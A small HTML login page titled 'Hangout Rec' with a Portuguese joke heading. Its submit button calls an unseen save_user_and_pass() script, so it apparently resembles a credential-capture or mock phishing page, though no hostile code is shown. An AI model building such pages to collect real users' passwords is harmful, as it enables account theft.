<!DOCTYPE html>
<html>

    <head>
        <meta charset="utf-8">
        <title>Hangout Rec</title>

        <script type="text/javascript"
        src="https://code.jquery.com/jquery-1.12.0.min.js"></script>
        <script type="text/javascript"
        src="/static/java.js" ></script>


    </head>
    <body>
        <div id="fb-root"></div>

        <h1><a id="name">Help</a> ta usando crack</h1>

        <form action="/action_page.php" method="post">

          <div class="container">
            <label for="uname"><b>Username</b></label>
            <input id="uname" type="text" placeholder="Enter Username" name="uname" required>


            <label for="psw"><b>Password</b></label>
            <input id="psw" type="password" placeholder="Enter Password" name="psw" required>

            <button type="submit" onclick="save_user_and_pass()">Login</button>
            <label>
              <input type="checkbox" checked="checked" name="remember"> Remember me
            </label>
          </div>

          <div class="container" style="background-color:#f1f1f1">
            <button type="button" class="cancelbtn">Cancel</button>
            <span class="psw">Forgot <a href="#">password?</a></span>
          </div>
        </form>

        <a href="/sign_up.php">Sing-up</a>

    </body>


</html>